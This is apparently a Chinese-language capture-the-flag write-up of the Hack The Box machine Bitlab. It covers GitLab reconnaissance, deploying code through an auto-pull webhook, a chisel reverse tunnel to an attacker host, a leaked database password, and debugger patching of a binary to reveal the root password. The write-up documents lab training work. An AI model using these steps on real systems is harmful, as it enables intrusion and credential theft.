信息收集

$ nmap -p- 10.10.10.114 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
|   256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_  256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open  http    nginx
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.114/users/sign_in
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

GitLab Community Edition

http://10.10.10.114/users/sign_in

$ feroxbuster --url http://10.10.10.114

)

http://10.10.10.114/help/bookmarks.html

www-data

点击Bookmark Link

返回到http://10.10.10.114/users/sign_in 点击书签

页面被自动填充

<?php $input = file_get_contents("php://input"); $payload  = json_decode($input); $repo = $payload->project->name ?? ''; $event = $payload->event_type ?? ''; $state = $payload->object_attributes->state ?? ''; $branch = $payload->object_attributes->target_branch ?? ''; if ($repo=='Profile' && $branch=='master' && $event=='merge_request' && $state=='merged') {     echo shell_exec('cd ../profile/; sudo git pull'),"\n"; } echo "OK\n";

当一个名为 "Profile" 的项目在 GitLab 中有针对 "master" 分支的合并请求被合并时，自动在服务器上执行 git pull 来更新本地代码库。

这意味着，如果恶意的东西放进仓库，它会自动部署到服务器。

http://10.10.10.114/profile/

http://10.10.10.114/root/profile/blob/master/index.php

仓库profile中，该页面似乎已经部署在当前环境

创建一个新的分支，然后将其合并到master中，因为这将触发更新。

合并到master中

http://10.10.10.114/profile/

显示和操作 Linux 系统中的邻居表

www-data@bitlab:/tmp# ip neigh

www-data@bitlab:/tmp$ nmap 172.19.0.2-5 --min-rate 1000 -sC -sV -open

Nmap scan report for 172.19.0.2
Host is up (0.00025s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
|_http-server-header: nginx
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://172.19.0.2/users/sign_in

Nmap scan report for 172.19.0.4
Host is up (0.00051s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE    VERSION
5432/tcp open  postgresql PostgreSQL DB 9.6.0 or later
| fingerprint-strings: 
|   SMBProgNeg: 
|     SFATAL
|     VFATAL
|     C0A000
|     Munsupported frontend protocol 65363.19778: server supports 2.0 to 3.0
|     Fpostmaster.c
|     L2064
|_    RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.60%I=7%D=9/1%Time=66D3C4DF%P=x86_64-pc-linux-gnu%r(SMB
SF:ProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20frontend
SF:\x20protocol\x2065363\.19778:\x20server\x20supports\x202\.0\x20to\x203\
SF:.0\0Fpostmaster\.c\0L2064\0RProcessStartupPacket\0\0");

Nmap scan report for 172.19.0.5
Host is up (0.00023s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 22:d5:7c:1f:9b:f3:09:ca:c7:54:de:7c:3f:e7:bd:a4 (RSA)
|   256 b7:66:cd:0d:92:30:30:7c:f9:ba:3a:10:7a:aa:10:af (ECDSA)
|_  256 95:c3:63:68:2f:d4:d0:a1:3e:19:eb:c7:1c:18:98:02 (EdDSA)
80/tcp   open  http         nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
|_http-server-header: nginx
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://172.19.0.5/users/sign_in
8181/tcp open  intermapper?
| fingerprint-strings: 
|   GenericLines, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Date: Sun, 01 Sep 2024 01:35:27 GMT
|     Location: http://127.0.0.1:8080/users/sign_in
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: DENY
|     X-Request-Id: ubpoqM1wyT
|     X-Runtime: 0.029878
|     X-Ua-Compatible: IE=edge
|     X-Xss-Protection: 1; mode=block
|     Content-Length: 101
|     <html><body>You are being <a href="http://127.0.0.1:8080/users/sign_in">redirected</a>.</body></html>
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Content-Length: 3108
|     Content-Type: text/html; charset=utf-8
|     Date: Sun, 01 Sep 2024 01:35:27 GMT
|     Expires: Fri, 01 Jan 1990 00:00:00 GMT
|     Pragma: no-cache
|     X-Request-Id: cDi9vgqagK9
|     X-Runtime: 0.006752
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport">
|     <title>The page you're looking for could not be found (404)</title>
|     <style>
|     body {
|     color: #666;
|     text-align: center;
|     font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
|     margin: auto;
|     font-size: 14px;
|     font-size: 56px;
|     line-height: 100px;
|     font-weight: 400;
|     color: #456;
|     font-size: 24px;
|     color: #666;
|     line-height: 1.5em;
|     color: #456;
|_    font-size
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8181-TCP:V=7.60%I=7%D=9/1%Time=66D3C4DF%P=x86_64-pc-linux-gnu%r(Get
SF:Request,1C7,"HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x20no-cache\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,\x2001\x2
SF:0Sep\x202024\x2001:35:27\x20GMT\r\nLocation:\x20http://127\.0\.0\.1:808
SF:0/users/sign_in\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Option
SF:s:\x20DENY\r\nX-Request-Id:\x20ubpoqM1wyT\r\nX-Runtime:\x200\.029878\r\
SF:nX-Ua-Compatible:\x20IE=edge\r\nX-Xss-Protection:\x201;\x20mode=block\r
SF:\nContent-Length:\x20101\r\n\r\n<html><body>You\x20are\x20being\x20<a\x
SF:20href=\"http://127\.0\.0\.1:8080/users/sign_in\">redirected</a>\.</bod
SF:y></html>")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\
SF:n\r\n400\x20Bad\x20Request")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnect
SF:ion:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,D4A,"HTTP/1\
SF:.0\x20404\x20Not\x20Found\r\nCache-Control:\x20no-cache,\x20no-store,\x
SF:20max-age=0,\x20must-revalidate\r\nContent-Length:\x203108\r\nContent-T
SF:ype:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,\x2001\x20Sep\x2020
SF:24\x2001:35:27\x20GMT\r\nExpires:\x20Fri,\x2001\x20Jan\x201990\x2000:00
SF::00\x20GMT\r\nPragma:\x20no-cache\r\nX-Request-Id:\x20cDi9vgqagK9\r\nX-
SF:Runtime:\x200\.006752\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x
SF:20<meta\x20content=\"width=device-width,\x20initial-scale=1,\x20maximum
SF:-scale=1\"\x20name=\"viewport\">\n\x20\x20<title>The\x20page\x20you're\
SF:x20looking\x20for\x20could\x20not\x20be\x20found\x20\(404\)</title>\n\x
SF:20\x20<style>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20color
SF::\x20#666;\n\x20\x20\x20\x20\x20\x20text-align:\x20center;\n\x20\x20\x2
SF:0\x20\x20\x20font-family:\x20\"Helvetica\x20Neue\",\x20Helvetica,\x20Ar
SF:ial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20margin:\x20auto;\n\x20\x20
SF:\x20\x20\x20\x20font-size:\x2014px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\
SF:x20h1\x20{\n\x20\x20\x20\x20\x20\x20font-size:\x2056px;\n\x20\x20\x20\x
SF:20\x20\x20line-height:\x20100px;\n\x20\x20\x20\x20\x20\x20font-weight:\
SF:x20400;\n\x20\x20\x20\x20\x20\x20color:\x20#456;\n\x20\x20\x20\x20}\n\n
SF:\x20\x20\x20\x20h2\x20{\n\x20\x20\x20\x20\x20\x20font-size:\x2024px;\n\
SF:x20\x20\x20\x20\x20\x20color:\x20#666;\n\x20\x20\x20\x20\x20\x20line-he
SF:ight:\x201\.5em;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20h3\x20{\n\x20\x2
SF:0\x20\x20\x20\x20color:\x20#456;\n\x20\x20\x20\x20\x20\x20font-size");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

postgresql && 隧道

$ chisel server -p 10000 --reverse

www-data@bitlab:/tmp$ ./chisel client 10.10.16.24:10000 R:5432:localhost:5432

连接之前。我们需要找到用户凭证

http://10.10.10.114/dashboard/snippets

http://10.10.10.114/snippets/1

username:profiles password:profiles

$ psql -h 127.0.0.1 -p 5432 -U profiles

profiles=> \list

profiles=> \dt

username:clave password:c3NoLXN0cjBuZy1wQHNz==

User.txt

17c8588ec3bd9790f0ae64ea8ad71d79

权限提升 && 逆向

$ scp [email protected]:~/RemoteConnection.exe .

找到call

Address=00F5165A
Disassembly=call dword ptr ds:[]
Destination=<shell32.ShellExecuteW> (75BDB110)

打断点后执行程序,发现jne指令执行后,跳过了shellexec函数。

在执行的时候我们需要nop掉对比过程

00F51640 | 817D 98 D831F500 | cmp dword ptr ss:[ebp-68],remoteconnect | F531D8:L"clave"

很明显这是做一个对比用户名，但是当前主机名不为clave，所以需要绕过if语句,进入Shellexec函数

进入函数

此时在堆栈中就有root用户的密码了

www-data@bitlab:/srv/docker/gitlab/postgresql$ su root

该exe必须x32gdb动态调试才会显示密码

Root.txt

8bd53c50dabbc99ea10a2803fba16481

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）